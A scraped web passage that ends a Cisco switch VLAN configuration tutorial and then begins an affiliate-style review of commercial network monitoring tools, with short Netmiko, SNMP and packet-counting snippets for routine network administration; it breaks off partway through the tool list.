S2(config-if)# switchport mode access

S2(config-if)# switchport access vlan 20

Use the “show running-config” command to see the new configuration taking effect on the interfaces.

Configuration on Switch 3 (S3)

S3(config)# interface fastethernet 0/2

S3(config-if)# switchport mode access

S3(config-if)# switchport access vlan 10

S3(config)# interface fastethernet 0/3

S3(config-if)# switchport mode access

S3(config-if)# switchport access vlan 20

A “show running-config” can show you our configuration results.

d. Configure trunk ports

Trunk ports are a type of switch port mode (just like access) that perform essential tasks like carrying traffic for multiple VLANs between switches, tagging VLAN traffic, supporting VLAN management, increasing bandwidth efficiency, and allowing inter-VLAN routing.

If we didn’t configure trunk ports between our switches, the PCs couldn’t talk to each other on different switches, even if they were on the same VLAN.

Here’s a step-by-step guide to configuring trunk ports:

  • Select the trunk port that will carry traffic between VLANs by typing “interface <interface ID>” (e.g., “interface FastEthernet0/12”).
  • Set the trunk encapsulation method (dot1q). The IEEE 802.1Q (dot1q) trunk encapsulation method is the standard for tagging Ethernet frames with VLAN information.
  • Configure the port as a trunk port by typing “switchport mode trunk”.
  • Repeat the steps for each trunk port you want to configure.

Note (on redundant trunk links): To keep our article simple, we will configure one trunk link. However, keep in mind that any good network design (including trunk links) needs redundancy. A single trunk link between switches is not an optimal solution for production networks. To add redundancy, we recommend using EtherChannel to bundle physical links together and configuring the logical link as a trunk port. Spanning Tree Protocol (STP) also comes into play here, keeping redundant links loop-free.

Let’s refer to our network diagram

Configuration on Switch 2 (S2)

S2(config)# interface fastethernet 0/12

S2(config-if)# switchport trunk encapsulation dot1q

S2(config-if)# switchport mode trunk

S2(config-if)# exit

Configuration on Switch 3 (S3)

S3(config)# interface fastethernet 0/24

S3(config-if)# switchport trunk encapsulation dot1q

S3(config-if)# switchport mode trunk

S3(config-if)# exit

Note: You can use different types of trunk encapsulation, such as dot1q and ISL; just make sure both ends use the same encapsulation type.

Extra Configuration to Consider

Once you finish with the VLAN and trunk configuration, remember to test VLAN connectivity between PCs. You can do this by configuring proper IP addressing and running a simple ping. Below are other key configurations related to your new VLANs that you might want to consider.

a. Ensure all your interfaces are up and running

To ensure that your interfaces are not administratively down, issue a “no shutdown” (or “no shut”) command on all the newly configured interfaces. You can also use the “show interfaces” command to see the status of all the interfaces.
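
If you manage more than a couple of switches, you can script these checks instead of typing them by hand. Here’s a rough sketch using the Netmiko Python library (the host and credentials are hypothetical):

from netmiko import ConnectHandler  # pip install netmiko

switch = {"device_type": "cisco_ios", "host": "192.0.2.10",
          "username": "admin", "password": "secret"}  # hypothetical details

with ConnectHandler(**switch) as conn:
    # Bring up the newly configured access and trunk ports
    conn.send_config_set(["interface range fastethernet 0/2 - 3", "no shutdown",
                          "interface fastethernet 0/12", "no shutdown"])
    # Verify that the interfaces are up
    print(conn.send_command("show interfaces status"))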

b. (Optional) Enable inter-VLAN routing

VLANs, as discussed earlier, separate broadcast domains (Layer 2) — they do not know how to route IP traffic because Layer 2 devices like switches can’t accept IP address configuration on their interfaces. To allow inter-VLAN communication (PCs on one VLAN communicate with PCs on another VLAN), you would need to use a Layer 3 device (a router or L3 switch) to route traffic.

There are three ways to implement inter-VLAN routing: an L3 router with multiple Ethernet interfaces, an L3 router with one router interface using subinterfaces (known as Router-On-a-Stick), and an L3 switch with SVI.

We will show a step-by-step on how to configure Router-On-a-Stick for inter-VLAN communications. 

  • Connect the router to one switch via a trunk port.
  • Configure subinterfaces on the router for each VLAN (10 and 20 in our example). To configure subinterfaces, use the “interface” command followed by the VLAN number with a period and a subinterface number (e.g., “interface FastEthernet0/0.10” for VLAN 10). For example, to configure subinterfaces for VLANs 10 and 20, you would use the following commands:

router(config)# interface FastEthernet 0/0

router(config-if)# no shutdown

router(config-if)# interface FastEthernet 0/0.10

router(config-subif)# encapsulation dot1Q 10

router(config-subif)# ip address 192.168.10.1 255.255.255.0

router(config-subif)# interface FastEthernet 0/0.20

router(config-subif)# encapsulation dot1Q 20

router(config-subif)# ip address 192.168.20.1 255.255.255.0

  • Configure a default route on the router using the “ip route” command. For example, the following sets a default route to the Internet through a gateway at IP address 192.168.1.1:

router(config)# ip route 0.0.0.0 0.0.0.0 192.168.1.1

c. Configure DHCP Server

To automatically assign IP addresses to devices inside the VLANs, you will need to configure a DHCP server. Follow these steps:

  1. The DHCP server should also be connected to the VLAN.
  2. Configure the DHCP server to provide IP addresses to devices in the VLAN.
  3. Configure the router to forward DHCP requests to the DHCP server by typing “ip helper-address <ip address>” (e.g., “ip helper-address 192.168.10.2”).

Final Words

By following the steps outlined in this post, you can easily set up a VLAN on your switch and effectively segment your network. Keep in mind to thoroughly test your VLAN configuration and consider additional configuration options to optimize your network for your specific needs.

With proper setup and configuration, VLANs can greatly enhance your network’s capabilities and significantly improve its performance and security.

Source :
https://www.pcwdld.com/how-to-set-up-a-vlan/

The Best Network Monitoring Tools & Software

Marc Wilson UPDATED: October 20, 2023

The realm of network monitoring tools, software, and vendors is huge, to say the least. New software, tools, and utilities are launched almost every year to compete in an ever-changing marketplace of IT monitoring, server monitoring, and system monitoring software.

I’ve test-driven, played with, and implemented dozens during my career, and this guide rounds up the best ones in an easy-to-read format, highlighting their main strengths and why I think they are in the top class of tools to use in your IT infrastructure and business.

Some of the features I am looking for are device discovery, uptime/downtime indicators, and robust, thorough alerting systems (via email/SMS), plus NetFlow and SNMP integration, as well as considerations that are important with any software purchase, such as ease of use and value for money.

The features above were all major points of interest when evaluating software suites for this article, and I’ll try to keep the list as up to date as possible with new feature sets and improvements as they are released.

Here is our list of the top network monitoring tools:

  1. Auvik – EDITOR’S CHOICE This cloud platform provides modules for LAN monitoring, Wi-Fi monitoring, and SaaS system monitoring. The network monitoring package discovers all devices, maps the network, and then implements automated performance tracking. Get a 14-day free trial.
  2. Paessler PRTG Network Monitor – FREE TRIAL A collection of monitoring tools and many of those are network monitors. Runs on Windows Server. Start a 30-day free trial.
  3. SolarWinds Network Performance Monitor – FREE TRIAL The leading network monitoring system that uses SNMP to check on network device statuses. This monitoring tool includes autodiscovery that compiles an asset inventory and automatically draws up a network topology map. Runs on Windows Server. Start 30-day free trial.
  4. Checkmk – FREE TRIAL This hybrid IT infrastructure monitoring package includes a comprehensive network monitor that provides device status tracking and traffic analysis functions via integration with ntop. Available as a Linux install package, Docker package, appliance, and cloud application in cloud marketplaces. Get a 30-day free trial.
  5. Datadog Network Monitoring – FREE TRIAL Provides good visibility over each of the components of your network and the connections between them – be it cloud, on-premises or hybrid environment. Troubleshoot infrastructure, apps and DNS issues effortlessly.
  6. ManageEngine OpManager – FREE TRIAL An SNMP-based network monitor that has great network topology layout options, all based on an autodiscovery process. Installs on Windows Server and Linux.
  7. NinjaOne RMM – FREE TRIAL This cloud-based system provides remote monitoring and management for managed service providers covering the systems of their clients.
  8. Site24x7 Network Monitoring – FREE TRIAL A cloud-based monitoring system for networks, servers, and applications. This tool monitors both physical and virtual resources.
  9. Atera – FREE TRIAL A cloud-based package of remote monitoring and management tools that include automated network monitoring and a network mapping utility.
  10. ManageEngine RMM Central – FREE TRIAL A powerful asset and network management package that includes patching, remote access, and automated remediation.

Related Post: Best Bandwidth Monitoring Software and Tools for Network Traffic Usage

The Top Network Monitoring Tools and Software

Below you’ll find an updated list of the latest tools and software to keep your network continuously tracked and monitored at all times of the day, ensuring the highest uptime possible. Most of them offer free downloads or trials of 15 to 30 days to get you started and confirm they meet your requirements.

What should you look for in network monitoring tools?

We reviewed the market for network monitoring software and analyzed the tools based on the following criteria:

  • An automated service that can perform network monitoring unattended
  • A device discovery routine that automatically creates an asset inventory
  • A network mapping service that shows live statuses of all devices
  • Alerts for when problems arise
  • The ability to communicate with network devices through SNMP
  • A free trial or a demo for a no-cost assessment
  • Value for money in a package that provides monitoring for all network devices at a reasonable price

With these selection criteria in mind, we have defined a shortlist of suitable network monitoring tools for all operating systems.

1. Auvik – FREE TRIAL

Auvik is a SaaS platform that offers a network discovery and mapping system that automates enrolment and then continues to operate in order to spot changes in network infrastructure. This system is able to centralize and unify the monitoring of multiple sites.

Key Features:

  • A SaaS package that includes processing power and storage space for system logs as well as the monitoring software
  • Centralizes the monitoring of networks on multiple sites
  • Watches over network device statuses
  • Offers two plans: Essential and Performance
  • Network traffic analysis included in the higher plan
  • Monitors virtual LANs as well as physical networks
  • Autodiscovery service
  • Network mapping
  • Alerts for automated monitoring
  • Integrations with third-party complementary systems

Why do we recommend it?

Auvik is a cloud-based network monitoring system. It reaches into your network, identifies all connected devices, and then creates a map. While SolarWinds Network Performance Monitor also performs those tasks, Auvik is a much lighter tool that you don’t have to host yourself and you don’t need deep technical knowledge to watch over a network with this automated system.

Auvik’s network monitoring system is automated, thanks to its system of thresholds. The service includes out-of-the-box thresholds that are placed on most of the metrics that the network monitor tracks. It is also possible to create custom thresholds.

Once the monitoring service is operating, if any of the thresholds are crossed, the system raises an alert. This mechanism allows technicians to get on with other tasks, knowing that the thresholds give them time to avert system performance problems that would be noticeable to users.

Network management tools that are included in the Auvik package include configuration management to standardize the settings of network devices and prevent unauthorized changes.

The processing power for Auvik is provided by the service’s cloud servers. However, the system requires collectors to be installed on each monitored site. This software runs on Windows Server and Ubuntu Linux. It is also possible to run the collector on a VM. Wherever the collector is located, the system manager still accesses the service’s console, which is based on the Auvik server, through any standard Web browser.

Who is it recommended for?

Smaller businesses that don’t have a team to support IT would benefit from Auvik. It needs no software maintenance and the system provides automated alerts when issues arise, so your few IT staff can get on with supporting other resources while Auvik looks after the network.

PROS:

  • A specialized network monitoring tool
  • Additional network management utilities
  • Configuration management included
  • A cloud-based service that is accessible from anywhere through any standard Web browser
  • Data collectors for Windows Server and Ubuntu Linux

CONS:

  • The system isn’t expandable with any other Auvik modules

Auvik doesn’t publish its prices, but you can access a 14-day free trial.

EDITOR’S CHOICE

Auvik is our top pick for a network monitoring tool because it is a hosted SaaS package that provides all of your network monitoring needs without you needing to maintain the software. The Auvik platform installs an agent on your site and then sets itself up by scanning the network and identifying all devices. The inventory that this system generates gives you details of all of your equipment and provides a basis for network topology maps. Repeated checks on the network gather performance statistics and if any metric crosses a threshold, the tool will generate an alert.  You can centralize the monitoring of multiple sites with this service.

Download: Get a 14-day FREE Trial

Official Site: https://www.auvik.com/#trial

OS: Cloud-based

2. PRTG Network Monitor from Paessler – FREE TRIAL

PRTG Network Monitor software is commonly known for its advanced infrastructure management capabilities. All devices, systems, traffic, and applications in your network can be easily displayed in a hierarchical view that summarizes performance and alerts. PRTG monitors the entire IT infrastructure using technology such as SNMP, WMI, SSH, Flows/Packet Sniffing, HTTP requests, REST APIs, Pings, SQL, and a lot more.

Key Features:

  • Autodiscovery that creates and maintains a device inventory
  • Live network topology maps are available in a range of formats
  • Monitoring for wireless networks as well as LANs
  • Multi-site monitoring capabilities
  • SNMP sensors to gather device health information
  • Ping to check on device availability
  • Optional extra sensors to monitor servers and applications
  • System-wide status overviews and drill-down paths for individual device details
  • A protocol analyzer to identify high-traffic applications
  • A packet sniffer to collect packet headers for analysis
  • Color-coded graphs of live data in the system dashboard
  • Capacity planning support
  • Alerts on device problems, resource shortages, and performance issues
  • Notifications generated from alerts that can be sent out by email or SMS
  • Available for installation on Windows Server or as a hosted cloud service

Why do we recommend it?

Paessler PRTG Network Monitor is a very flexible package. Not only does it monitor networks, but it can also monitor endpoints and applications. The PRTG system will discover and map your network, creating a network inventory, which is the basis for automated monitoring. You put together your ideal monitoring system by choosing which sensors to turn on. You pay for an allowance of sensors.

It is one of the best choices for organizations with little experience in network monitoring software. The user interface is powerful and very easy to use.

A distinctive feature of PRTG is its ability to monitor devices in the data center with a mobile app. A QR code that corresponds to the sensor is printed out and attached to the physical hardware. The mobile app is used to scan the code, and a summary of the device is displayed on the mobile screen.

In summary, Paessler PRTG is a flexible package of sensors that you can tailor to your own needs by deciding which monitors to activate. The SNMP-based network performance monitoring routines include an autodiscovery system that generates a network asset inventory and topology maps. You can also activate traffic monitoring features that can communicate with switches through NetFlow, sFlow, J-Flow, and IPFIX. QoS and NBAR features enable you to keep your time-sensitive applications working properly.

Who is it recommended for?

PRTG is available in a Free edition, which is limited to 100 sensors. This is probably enough to support a small network. Mid-sized and large organizations should be interested in paying for larger allowances of sensors. The tool can even monitor multiple sites from one location.

PROS:

  • Uses a combination of packet sniffing, WMI, and SNMP to report network performance data
  • Fully customizable dashboard is great for both lone administrators as well as NOC teams
  • Drag and drop editor makes it easy to build custom views and reports
  • Supports a wide range of alert mediums such as SMS, email, and third-party integrations into platforms like Slack
  • Each sensor is specifically designed to monitor each application, for example, there are prebuilt sensors whose specific purpose is to capture and monitor VoIP activity
  • Supports a freeware version

CONS:

  • Is a very comprehensive platform with many features and moving parts that require time to learn

PRTG has a very flexible pricing plan; to get an idea, visit the official pricing webpage below. It is free to use for up to 100 sensors. Beyond that, you get a 30-day free trial to figure out your network requirements.

Paessler PRTGDownload a 30-day FREE Trial

3. SolarWinds Network Performance Monitor – FREE TRIAL


SolarWinds Network Performance Monitor is easy to set up and can be ready in no time. The tool automatically discovers network devices and deploys within an hour. Its simple approach to overseeing an entire network gives it one of the easiest-to-use and most intuitive user interfaces.

Key Features:

  • Automatic Network Discovery and Scanning for Wired and WiFi Computers and Devices
  • Support for Wide Array of OEM Vendors
  • Forecast and Capacity Planning
  • Quickly Pinpoint Issues with Network Performance with NetPath™ Critical Path visualization feature
  • Easy to Use Performance Dashboard to Analyze Critical Data points and paths across your network
  • Robust Alerting System with options for Simple/Complex Triggers
  • Monitor CISCO ASA networks with their New Network Insight™ for CISCO ASA
  • Monitor ACLs, VPNs, and Interfaces on your Cisco ASA
  • Monitor Firewall rules through Firewall Rules Browser
  • Hop by Hop Analysis of Critical Network Paths and Components
  • Automatically Discover Networks and Map them along with Topology Views
  • Manage, Monitor and Analyze Wifi Networks within the Dashboard
  • Create HeatMaps of Wifi Networks to pin-point Wifi Dead Spots
  • Monitor Hardware Health of all Servers, Firewalls, Routers, Switches, Desktops, laptops and more
  • Real-Time Network and Netflow Monitoring for Critical Network Components and Devices

Why do we recommend it?

SolarWinds Network Performance Monitor is the leading network monitoring tool in the world and this is the system that the other monitor providers are chasing. Like many other network monitors, this system uses the Simple Network Management Protocol (SNMP) to gather reports on network devices. The strength of SolarWinds lies in the deep technical knowledge of its support advisors, which many other providers lack.

The product is highly customizable and the interface is easy to manage and change very quickly. You can customize the web-based performance dashboards, charts, and views. You can design a tailored topology for your entire network infrastructure. You can also create customized dependency-aware intelligent alerts and much more.

SolarWinds NPM Application Summary

The software is sold as separate modules based on what you use. SolarWinds Network Performance Monitor pricing starts from $1,995 for a one-time license that includes first-year maintenance.

SolarWinds NPM has an Extensive Feature List that makes it One of the Best Choices for Network Monitoring Solutions

SolarWinds NPM is able to track the performance of networks autonomously through the use of SNMP procedures, producing alerts when problems arise. Alerts are generated if performance dips and also in response to emergency notifications sent out by device agents. This system means that technicians don’t have to watch the monitoring screen all the time because they know that they will be drawn back to fix problems by an email or SMS notification.

SolarWinds NPM - NetPath Screenshot

Who is it recommended for?

SolarWinds Network Performance Monitor is an extensive network monitoring system and it is probably over-engineered for use by a small business. Mid-sized and large companies would benefit from using this tool.

PROS:

  • Supports auto-discovery that builds network topology maps and inventory lists in real-time based on devices that enter the network
  • Has some of the best alerting features that balance effectiveness with ease of use
  • Supports both SNMP monitoring as well as packet analysis, giving you more control over monitoring than similar tools
  • Uses drag and drop widgets to customize the look and feel of the dashboard
  • Tons of pre-configured templates, reports, and dashboard views

CONS:

  • This is a feature-rich enterprise tool designed for sysadmins; non-technical users may find some features overwhelming

You can start with a 30-day free trial.

SolarWinds NPMDownload a 30-day FREE Trial!

4. Checkmk – FREE TRIAL

Checkmk Uplink Bandwidth Graph

Checkmk is an IT asset monitoring package that has the ability to watch over networks, servers, services, and applications. The network monitoring facilities in this package provide both network device status tracking and network traffic monitoring.

Features of this package include:

  • Device discovery that cycles continuously, spotting new devices and removing retired equipment
  • Creation of a network inventory
  • Registration of switches, routers, firewalls, and other network devices
  • Creation of a network topology map
  • Continuous device status monitoring with SNMP
  • SNMP feature report focus for small businesses
  • Performance thresholds with alerts
  • Wireless network monitoring
  • Protocol analysis
  • Traffic throughput statistics per link
  • Switch port monitoring
  • Gateway transmission speed tracking
  • Network traffic data extracted with ntop
  • Can monitor a multi-vendor environment

Why do we recommend it?

The Checkmk combination of network device monitoring and traffic monitoring in one tool is rare. Most network monitoring service creators split those two functions so that you have to buy two separate packages. The Checkmk system also gives you application and server monitoring along with the network monitoring service.

The Checkmk system is easy to set up, thanks to its autodiscovery mechanism. This is based on SNMP. The program will act as an SNMP Manager, send out a broadcast requesting reports from device agents, and then compile the results into an inventory. The agent is the Checkmk package itself if you choose to install the Linux version or it is embedded on a device if you go for the hardware option. If you choose the Checkmk Cloud SaaS option, that platform will install an agent on one of your computers.

The SNMP Manager constantly re-polls for device reports and the values in these appear in the Checkmk device monitoring screen. The platform also updates its network inventory according to the data sent back by device agents in each request/response round. The dashboard also generates a network topology map from information in the inventory. So, that map updates whenever the inventory changes.
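
For readers unfamiliar with SNMP polling, a single poll of this kind can be sketched in a few lines of Python using the classic pysnmp high-level API (the address and community string below are lab placeholders; Checkmk's own poller is more sophisticated):

# One SNMP GET poll for a device's sysDescr, using pysnmp (pip install pysnmp).
from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, ObjectType, ObjectIdentity, getCmd)

error_indication, error_status, error_index, var_binds = next(getCmd(
    SnmpEngine(),
    CommunityData('public', mpModel=1),          # SNMP v2c
    UdpTransportTarget(('192.0.2.1', 161)),      # placeholder lab device
    ContextData(),
    ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

if error_indication:
    print(error_indication)
else:
    for name, value in var_binds:
        print(f'{name} = {value}')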

Checkmk Network Topology

While gathering information through SNMP, the tool also scans the headers of passing packets on the network to compile traffic statistics. Essentially, the tool keeps a packet count, which enables it to quickly calculate a traffic throughput rate. Data can also be segmented per protocol, according to the TCP port number in each header.
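
The packet-count idea is simple to sketch with scapy in Python (this illustrates the technique only, not Checkmk's implementation, and it requires packet-capture privileges):

# Rough sketch of per-port traffic accounting from packet headers,
# using scapy (pip install scapy).
from collections import Counter
from scapy.all import sniff, TCP

bytes_per_port = Counter()

def tally(pkt):
    if TCP in pkt:
        bytes_per_port[pkt[TCP].dport] += len(pkt)

sniff(filter="tcp", prn=tally, timeout=10)   # sample the wire for 10 seconds
for port, total in bytes_per_port.most_common(5):
    print(f"TCP port {port}: {total} bytes, ~{total * 8 / 10:.0f} bit/s")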

Who is it recommended for?

Checkmk has a very wide appeal because of its three editions. Checkmk Raw is free and will appeal to small businesses. This is an adaptation of Nagios Core. The paid version of the system is called Checkmk Enterprise and that is designed for mid-sized and large businesses. Checkmk Cloud is a SaaS option.

PROS:

  • Provides both network device monitoring and traffic tracking
  • Automatically discovers devices and creates a network inventory
  • Free version available
  • Options for on-premises or SaaS delivery
  • Monitors wireless networks as well as LANs
  • Available for installation on Linux or as an appliance

CONS:

  • Provides a lot of screens to look through

Start a 30-day free trial.

CheckmkStart 30-day FREE Trial

5. Datadog Network Monitoring – FREE TRIAL

Datadog App Performance

Datadog Network Monitoring supervises the performance of network devices. The service is a cloud-based system that is able to explore a network and detect all connected devices. With the information from this research, the network monitor will create an asset inventory and draw up a network topology map. This procedure means that the system performs its own setup routines.

Features of this package include:

  • Monitors networks anywhere, including remote sites
  • Joins together on-premises and cloud-based resource monitoring
  • Integrates with other Datadog modules, such as log management
  • Offers an overview of all network performance and drill-down details of each device
  • Facilitates troubleshooting by identifying performance dependencies
  • Includes DNS server monitoring
  • Gathers SNMP device reports
  • Blends performance data from many information sources
  • Includes data flow monitoring
  • Offers tag-based packet analysis utilities in the dashboard
  • Integrates protocol analyzers
  • Performance threshold baselining based on machine learning
  • Alerts for warnings over evolving performance issues
  • Packages offer network performance monitoring tools (traffic analysis) or network device monitoring
  • Subscription charges with no startup costs

Why do we recommend it?

Datadog Network Monitoring services are split into two modules that are part of a cloud platform of many system monitoring and management tools. These two packages are called Network Performance Monitoring and Network Device Monitoring, which are both subscription services. While the device monitoring package works through SNMP, the performance monitor measures network traffic levels.

The autodiscovery process is ongoing, so it spots any changes you make to your network and instantly updates the inventory and the topology map. The service can also identify virtual systems and extend monitoring of links out to cloud resources.

Datadog Network Monitoring

Datadog Network Monitoring provides end-to-end visibility of all connections, which are also correlated with performance issues highlighted in log messages. The dashboard for the system is resident in the cloud and accessed through any standard browser. This centralizes network performance data from many sources and covers the entire network, link by link and end to end.

You can create custom graphs, metrics, and alerts in an instant, and the software can adjust them dynamically based on different conditions. Datadog pricing starts from free (up to five hosts), with Pro at $15 per host, per month, and Enterprise at $23 per host, per month.

Who is it recommended for?

The two Datadog network monitoring packages are very easy to sign up for. They work well together to give a complete view of network activities. The pair will discover all of the devices on your network and map them, then start up automated monitoring. These are very easy-to-use systems that are suitable for businesses of any size.

PROS:

  • Has one of the most intuitive interfaces among other network monitoring tools
  • Cloud-based SaaS product allows monitoring with no server deployments or onboarding costs
  • Can monitor both internally and externally giving network admins a holistic view of network performance and accessibility
  • Supports auto-discovery that builds network topology maps on the fly
  • Changes made to the network are reflected in near real-time
  • Allows businesses to scale their monitoring efforts reliably through flexible pricing options

CONS:

  • Would like to see a longer trial period for testing

Start a 14-day free trial.

DatadogStart a 14-day FREE Trial

6. ManageEngine OpManager – FREE TRIAL

ManageEngine OpManager Linux Network Monitoring

At its core, ManageEngine OpManager is infrastructure management, network monitoring, and application performance management “APM” (with APM plug-in) software.

Key Features:

  • Includes server monitoring as well as network monitoring
  • Autodiscovery function for automatic network inventory assembly
  • Constant checks on device availability
  • A range of network topology map options
  • Automated network mapping
  • Performs an SNMP manager role, constantly polling for device health statuses
  • Receives SNMP Traps and generates alerts when device problems arise
  • Implements performance thresholds and identifies system problems
  • Watches over resource availability
  • Customizable dashboard with color-coded dials and graphs of live data
  • Forwards alerts to individuals by email or SMS
  • Available for Windows Server and Linux
  • Can be enhanced by an application performance monitor to create a full stack supervisory system
  • Free version available
  • Distributed version to supervise multiple sites from one central location

Why do we recommend it?

ManageEngine OpManager is probably the biggest threat to SolarWinds' leading position. This package monitors servers as well as networks, which makes it a great system for monitoring virtualizations.

When it comes to network management tools, this product is well balanced when it comes to monitoring and analysis features.

The solution can manage your network, servers, network configuration, and fault and performance; it can also analyze your network traffic. To run ManageEngine OpManager, it must be installed on-premises.

A highlight of this product is that it comes with pre-configured network monitor device templates. These contain pre-defined monitoring parameters and intervals for specific device types.
The Essential edition can be purchased for $595, which allows up to 25 devices.

Who is it recommended for?

A nice feature of OpManager is that it is available for Linux as well as Windows Server for on-premises installation and it can also be used as a service on AWS or Azure for businesses that don’t want to run their own servers. The pricing for this package is very accessible for mid-sized and large businesses. Small enterprises with simple networks should use the Free edition, which is limited to covering a network with three connected devices.

PROS:

  • Designed to work right away, features over 200 customizable widgets to build unique dashboards and reports
  • Leverages autodiscovery to find, inventory, and map new devices
  • Uses intelligent alerting to reduce false positives and eliminate alert fatigue across larger networks
  • Supports email, SMS, and webhook for numerous alerting channels
  • Integrates well in the ManageEngine ecosystem with their other products

CONS:

  • Is a feature-rich tool that will require a time investment to properly learn

Start a 30-day free trial.

ManageEngine OpManagerDownload a 30-day FREE Trial

7. NinjaOne RMM – FREE TRIAL

NinjaOne Endpoint Management

NinjaOne is a remote monitoring and management (RMM) package for managed service providers (MSPs). The system reaches out to each remote network through the installation of an agent on one of its endpoints. The agent acts as an SNMP Manager.

Key Features:

  • Based on the Simple Network Management Protocol
  • SNMP v1, 2, and 3
  • Device discovery and inventory creation
  • Continuous status polling for network devices and endpoints
  • Live traffic data with NetFlow, IPFIX, J-Flow, and sFlow
  • Traffic throughput graphs
  • Customizable detail display
  • Performance graphs
  • Switch port mapper
  • Device availability checks
  • Syslog processing for device status reports
  • Customizable alerts
  • Notifications by SMS or email
  • Related endpoint monitoring and management

Why do we recommend it?

NinjaOne RMM enables each technician to support multiple networks simultaneously. The alerting mechanism in the network monitoring service means that you can assume that everything is working fine on a client’s system unless you receive a notification otherwise. The network tracking service sets itself up automatically with a discovery routine.

The NinjaOne RMM package provides a full suite of tools for administering a client's system. The network monitoring service is part of that bundle along with endpoint monitoring and patch management.

The NinjaOne system onboards a new client site automatically through a discovery service that creates both hardware and software inventories. The data for each client is kept separate in a subaccount. Technicians who need access to a client's system for investigation must be set up with credentials.

The network monitoring system provides both device status tracking and network traffic analysis. The service provides notifications if a device goes offline or throughput drops.

Who is it recommended for?

This service is built with a multi-tenant architecture for use by managed service providers. However, IT departments can also use the system to manage their own networks and endpoints. The service is particularly suitable for simultaneously monitoring multiple sites. The console for the RMM is based in the cloud and accessed through any standard Web browser.

PROS:

  • A cloud-based package that onboards sites through the installation of an agent
  • Auto discovery for network devices and endpoints
  • Network device status monitoring
  • Network traffic analysis
  • Syslog message scanning

CONS:

  • No price list

NinjaOne doesn’t publish a price list so you start your buyer’s journey by accessing a 14-day free trial.

NinjaOneStart a 14-day FREE Trial

8. Site24x7 Network Monitoring – FREE TRIAL

Site24x7 Network Performance Monitor

Site24x7 is a monitoring service that covers networks, servers, and applications. The network monitoring service in this package starts off by exploring the network for connected devices. It logs its findings in a network inventory and draws up a network topology map.

Key Features:

  • A hosted cloud-based service that includes CPU time and performance data storage space
  • Can unify the monitoring of networks on site all over the world
  • Uses SNMP to check on device health statuses
  • Gives alerts on resource shortages, performance issues, and device problems
  • Generates notifications to forward alerts by email or SMS
  • Root cause analysis features
  • Autodiscovery for a constantly updated network device inventory
  • Automatic network topology mapping
  • Includes internet performance monitoring for utilities such as VPNs
  • Specialized monitoring routines for storage clusters
  • Monitors boundary and edge services, such as load balancers
  • Offers overview and detail screens showing the performance of the entire network and also individual devices
  • Includes network traffic flow monitoring
  • Facilities for capacity planning and bottleneck identification
  • Integrates with application monitoring services to create a full stack service

Why do we recommend it?

Site24x7 Network Monitoring is part of a platform that is very similar to Datadog. A difference lies in the number of modules that Site24x7 offers – it has far fewer than Datadog. Site24x7 bundles its modules into packages with almost all plans providing monitoring for networks, servers, services, applications, and websites. Site24x7 was originally developed to be a SaaS plan for ManageEngine but then was split out into a separate brand, so there is very solid expertise behind this platform.

The Network Monitor uses procedures from the Simple Network Management Protocol (SNMP) to poll devices every minute for status reports. Any changes in the network infrastructure that are revealed by these responses update the inventory and topology map.

The results of the device responses are interpreted into live data in the dashboard of the monitor. The dashboard is accessed through any standard browser and its screens can be customized by the user.

The SNMP system empowers device agents to send out a warning without waiting for a request if they detect a problem with the device they are monitoring. Site24x7 Infrastructure catches these messages, which are called Traps, and generates an alert. This alert can be forwarded to technicians by SMS, email, voice call, or instant message.
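
To make the Trap mechanism concrete, here is a minimal sketch that emits a standard coldStart Trap with Python's pysnmp library (the receiver address is a placeholder; in a real deployment the monitoring platform's collector would be listening on UDP 162):

# Agent-initiated SNMPv2c Trap (coldStart), sent with pysnmp.
from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, NotificationType, ObjectIdentity,
                          sendNotification)

error_indication, _, _, _ = next(sendNotification(
    SnmpEngine(),
    CommunityData('public', mpModel=1),
    UdpTransportTarget(('192.0.2.50', 162)),   # placeholder Trap receiver
    ContextData(),
    'trap',
    NotificationType(ObjectIdentity('SNMPv2-MIB', 'coldStart'))))

if error_indication:
    print(error_indication)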

The Network Monitor also has a traffic analysis function. This extracts throughput figures from switches and routers and displays data flow information in the system dashboard. This data can also be used for capacity planning.

Who is it recommended for?

The plans for Site24x7 are very reasonably priced, which makes them accessible to businesses of all sizes. Setup for the system is automated and much of the ongoing monitoring processes are carried out without any manual intervention.

PROS:

  • One of the most holistic monitoring tools available, supporting networks, infrastructure, and real user monitoring in a single platform
  • Uses real-time data to discover devices and build charts, network maps, and inventory reports
  • Is one of the most user-friendly network monitoring tools available
  • User monitoring can help bridge the gap between technical issues, user behavior, and business metrics
  • Supports a freeware version for testing

CONS:

  • Is a very detailed platform that will require time to fully learn all of its features and options

Site24x7 costs $9 per month when paid annually. It is available for a free trial.

Site24x7Get the FREE Trial

9. Atera – FREE TRIAL

Atera Screenshot

Atera is a software package that was built for managed service providers. It is a SaaS platform and it includes professional service automation (PSA) and remote monitoring and management (RMM) systems.

Why do we recommend it?

Atera is a package of tools for managed service providers (MSPs). Alongside remote network monitoring capabilities, this package provides automated monitoring services for all IT operations. The package also includes some system management tools, such as a patch manager. Finally, the Atera platform offers Professional Services Automation (PSA) tools to help the managers of MSPs to run their businesses.

The network monitoring system operates remotely through an agent that installs on Windows Server. The agent enables the service to scour the network and identify all of the network devices that run on it. This is performed using SNMP, with the agent acting as the SNMP Manager.

The SNMP system enables the agent to spot Traps, which warn of device problems. These are sent to the Atera network monitoring dashboard, where they appear as alerts. Atera offers an automated topology mapping service, but this is an add-on to the main subscription packages.

Who is it recommended for?

Atera charges for its platform per technician, so it is very affordable for MSPs of all sizes. This extends to sole technicians operating on a contract basis and possibly fielding many small business clients.

PROS:

  • Remote automated network discovery
  • Network performance monitoring with SNMP
  • Alerts for notified device problems
  • Also includes remote system management tools
  • Scalable pricing with three plan levels
  • 30-day free trial

CONS:

  • Network mapping costs extra

You can start a 30-day free trial.

AteraStart 30-day Free Trial

10. ManageEngine RMM Central – FREE TRIAL

ManageEngine RMM Central

ManageEngine RMM Central provides sysadmins with everything they need to support their network. Automated asset discovery makes deployment simple, allowing you to have all devices on your network inventoried by the end of the day.

Key Features

  • Automated network monitoring and asset discovery
  • Built-in remote access with various troubleshooting tools
  • Flexible alert integrations

With network and asset metrics collected, administrators can quickly see critical insights automatically generated by the platform. With over 100 automated reports, it's easy to see exactly where your bottlenecks are and which endpoints are having trouble.

Administrators can configure their own SLAs with various automated alert options and even pair those alerts with other automations that integrate into their helpdesk workflow.

PROS:

